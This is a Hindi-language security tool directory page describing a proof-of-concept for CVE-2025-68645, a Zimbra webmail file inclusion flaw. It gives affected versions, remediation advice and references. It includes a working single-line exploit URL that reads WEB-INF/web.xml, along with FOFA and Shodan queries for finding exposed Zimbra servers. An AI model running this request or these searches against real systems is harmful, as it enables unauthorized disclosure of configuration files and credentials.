Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
zimbramail-CVE-2025-68645-poc — CVE-2025-68645 - Zimbra Collaboration के Webmail Classic UI में एक Local File Inclusion (LFI) भेद्यता | Kitploit
उपकरण/GitHubGitHub/maxmnml/zimbramail-cve-2025-68645-poc
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubmaxmnml/zimbramail-cve-2025-68645-poc

zimbramail-CVE-2025-68645-poc

CVE-2025-68645 - Zimbra Collaboration के Webmail Classic UI में एक Local File Inclusion (LFI) भेद्यता

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
38 महीने पहलेअभी तक समीक्षित नहीं

zimbramail-CVE-2025-68645-poc

Zimbra Collaboration (ZCS) 10.0 और 10.1 के Webmail Classic UI में मौजूद Local File Inclusion (LFI) भेद्यता का फायदा उठाने वाला एक प्रूफ-ऑफ-कॉन्सेप्ट, जो RestFilter servlet में उपयोगकर्ता-आपूर्ति अनुरोध मापदंडों के अनुचित हैंडलिंग के कारण उत्पन्न होती है।

भेद्यता

यह भेद्यता RestFilter servlet में अनुचित इनपुट सत्यापन के कारण मौजूद है। एक अनधिकृत रिमोट हमलावर /h/rest एंडपॉइंट पर अनुरोध तैयार कर सकता है ताकि आंतरिक अनुरोध डिस्पैचिंग को प्रभावित किया जा सके, जिससे WebRoot निर्देशिका से मनमानी फाइलों को शामिल किया जा सके।

  • उपयोगकर्ता-नियंत्रित मापदंड सही ढंग से सैनिटाइज़ नहीं किए जाते हैं।
  • आंतरिक अनुरोध रूटिंग में हेरफेर किया जा सकता है।
  • WebRoot निर्देशिका के अंतर्गत मनमानी फाइलें सर्वर प्रतिक्रियाओं में शामिल की जा सकती हैं।

प्रभावित संस्करण

  • 10.0.18 से पहले के Zimbra संस्करण 10.0.x
  • 10.1.13 से पहले के Zimbra संस्करण 10.1.x

Poc (sirifu4k1 द्वारा)

root@kitploit:~
http://127.0.0.1/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml

Zimbra WebRoot निर्देशिका के बारे में : https://github.com/Zimbra/zm-web-client/tree/develop/WebRoot

स्वचालन

Nuclei-टेम्पलेट:

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-68645.yaml

वास्तविक दुनिया में

FOFA:

root@kitploit:~
((title="Zimbra Web Client Sign In") || (title="Zimbra 网络客户端登录"))

SHODAN:

root@kitploit:~
http.title:"Zimbra Web Client Sign In"

प्रभाव

एक अनधिकृत रिमोट हमलावर WebRoot निर्देशिका से मनमानी फाइलों को शामिल कर सकता है, जिससे संवेदनशील जानकारी उजागर हो सकती है।

  • संवेदनशील फाइलें पढ़ें (कॉन्फ़िग, पर्यावरण डेटा)
  • क्रेडेंशियल या आंतरिक पथ लीक करें
  • आगे के शोषण के लिए जानकारी जुटाएँ
  • गहरे समझौते के लिए अन्य भेद्यताओं के साथ जोड़ें

वेक्टर 3.x CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H / बेस स्कोर 3.x 8.80 / गंभीरता 3.x HIGH

सुधार और शमन

Zimbra Collaboration के नवीनतम संस्करण में अपडेट करें।

  • ZCS 10.0.18
  • ZCS 10.1.13 और बाद के संस्करण

अनुशंसित क्रियाएँ :

  1. तुरंत पैच किए गए संस्करण में अपग्रेड करें
  2. यदि आवश्यक न हो तो Classic UI अक्षम करें
  3. /h/rest तक संदिग्ध पहुंच के लिए लॉग की निगरानी करें
  4. जहां संभव हो Zimbra वेब एंडपॉइंट तक सार्वजनिक पहुंच प्रतिबंधित करें
  5. WebRoot अनुमतियों और उजागर फाइलों की समीक्षा करें

संदर्भ

https://nvd.nist.gov/vuln/detail/CVE-2025-68645

https://wiki.zimbra.com/wiki/Security_Center

https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy

https://x.com/sirifu4k1/status/2006031417088639064

अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण के लिए है। कंप्यूटर प्रणालियों तक अनधिकृत पहुंच अवैध है।

टूल डाउनलोड करें